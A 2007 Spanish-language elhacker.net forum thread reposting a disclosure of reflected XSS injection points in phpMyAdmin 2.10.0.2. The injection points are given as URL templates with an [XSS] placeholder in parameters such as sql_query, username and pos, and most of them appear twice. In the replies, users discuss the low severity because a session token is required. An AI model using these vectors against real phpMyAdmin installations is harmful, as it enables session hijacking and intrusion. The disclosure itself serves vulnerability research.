Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: yeikos en 25 Agosto 2007, 02:47 am


Título: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] - 0day
Publicado por: yeikos en 25 Agosto 2007, 02:47 am
Citar
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
single_table=true

Fuente original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html

Título: Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day
Publicado por: sirdarckcat en 25 Agosto 2007, 02:52 am
El hecho que todos requieran un SID lo hacen de peligrosidad muy baja.. casi nula..

Saludos!!

Título: Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day
Publicado por: yeikos en 25 Agosto 2007, 03:29 am
Sí, aún así no deja de ser interesante y de alguna manera preocupante por parte de los programadores de éste proyecto.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines